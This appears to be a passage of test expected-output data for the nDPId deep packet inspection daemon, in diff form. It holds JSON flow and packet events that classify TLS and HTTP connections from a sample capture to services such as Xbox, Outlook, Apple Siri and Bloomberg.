+00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482995689,"flow_last_seen":1646482995711,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482995711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":448,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482995732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646483012464,"flow_last_seen":1646483012464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646483012464,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1646483012464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646483012464,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8NmFAAEAGec\/AqAGAKGGgApuUAbvrsR4tAAAAAKAC+vCXKwAAAgQFtAQCCAqLefivAAAAAAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1646483012642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646483012642,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0h61AAOYGgoooYaACwKgBgAG7m5Tksd5d67EeLoAS\/\/96NQAAAgQFtAEDAwgBAQQC"} +01149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1646483012643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646483012643,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItNmNAAEAGd9zAqAGAKGGgApuUAbvrsR4u5LHeXlAYAfZhOgAAFgMBAgABAAH8AwO1u+oefRTEOwSLQjLjHhVV0xmNEBLIePou\/aAHVOd2CCAPyrTST2MnYmbxM2VIZnvQo7xJWWszq6XT0HB3y7IoMAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtvdXRsb29rLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBWvkXIQj27ydSlWNcrtPVAAtDjckdSwzserfJQbjqaWAAXAEEEmLcB97hFECojXeQm9a5elnWgKYRExdFmjiW10ZfBGP+icRnFpjaWBz97zhMeOCLZ79LJYWeVZvs9jOUTVoTTCAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646483012464,"flow_last_seen":1646483012643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646483012643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"},"tls": {"version":"TLSv1.2","client_requested_server_name":"outlook.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01697{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646483012464,"flow_last_seen":1646483012821,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4952,"flow_avg_l4_payload_len":707,"midstream":0,"thread_ts_msec":1646483012821,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"outlook.com","server_names":"*.internal.outlook.com,*.outlook.com,outlook.com,office365.com,*.office365.com,*.outlook.office365.com,*.office.com,outlook.office.com,substrate.office.com,attachment.outlook.live.net,attachment.outlook.office.net,attachment.outlook.officeppe.net,attachments.office.net,*.clo.footprintdns.com,*.nrb.footprintdns.com,ccs.login.microsoftonline.com,ccs-sdf.login.microsoftonline.com,substrate-sdf.office.com,attachments-sdf.office.net,*.live.com,mail.services.live.com,hotmail.com,*.hotmail.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"71d9ce75f347e6cf54268d7114ae6925","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=outlook.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"4E:39:B4:13:4B:8C:77:57:7D:80:3D:76:40:E8:88:22:05:00:1C:58"}} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":458,"packets-processed":457,"total-skipped-flows":0,"total-l4-data-len":197833,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":32,"total-detection-updates":38,"total-updates":0,"current-active-flows":27,"total-active-flows":36,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":230,"global_ts_msec":1646495488872} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495488872,"flow_last_seen":1646495488872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488872,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1646495488872,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495488872,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8\/MhAAEAGRHDAqAGAD6Anu7NKAbvmP22QAAAAAKAC+vBpUQAAAgQFtAQCCAoE\/txmAAAAAAEDAwc="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1646495488880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495488880,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADIGTzkPoCe7wKgBgAG7s0optQbo5j9tkaAS9LPzBQAAAgQFtAQCCAoEQEeaBP7cZgEDAwc="} -01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1646495488882,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495488882,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5\/MpAAEAGQnHAqAGAD6Anu7NKAbvmP22RKbUG6YAYAfaZtgAAAQEICgT+3HEEQEeaFgMBAgABAAH8AwO25geT89HZVQIHdAvPqVcdroWBp1YfQbaMJ\/IT9jA01iAQ9v2Qg1QtgoSL\/wrZgtn2pCmqUafGB71JcGJ1a5vPpQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFndXp6b25pLmFwcGxlLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAfoSMbRE149N9PW6YpT\/B1gLVQ\/izORnimYk5vzkOPIwAXAEEEYgA3US97mm0LBVaj+yl1ih4nt3Ma4wqV+qwTQtcgUnIu95ynuvYl8aODuWCNRrQ8KDDItT25yW1YelOufG9kvAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495488872,"flow_last_seen":1646495488882,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495488882,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.2","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":461,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.3","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"}} -00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482801387,"flow_last_seen":1646482801394,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.GoogleCloud","breed":"Acceptable","category":"Cloud"},"http": {}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482801387,"flow_last_seen":1646482801394,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646482825245,"flow_last_seen":1646482890325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Bloomberg","breed":"Acceptable","category":"Network"},"http": {}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646482825245,"flow_last_seen":1646482890325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482844787,"flow_last_seen":1646482844825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5346,"flow_avg_l4_payload_len":594,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482646628,"flow_last_seen":1646482646693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5845,"flow_avg_l4_payload_len":649,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482686914,"flow_last_seen":1646482687080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482686914,"flow_last_seen":1646482687080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482879566,"flow_last_seen":1646482879632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4764,"flow_avg_l4_payload_len":595,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482860064,"flow_last_seen":1646482860150,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5476,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482734324,"flow_last_seen":1646482734359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4476,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"}} 